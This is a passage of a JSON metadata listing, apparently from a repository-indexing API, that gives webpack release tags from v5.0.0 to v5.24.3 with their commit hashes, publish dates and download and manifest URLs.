4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"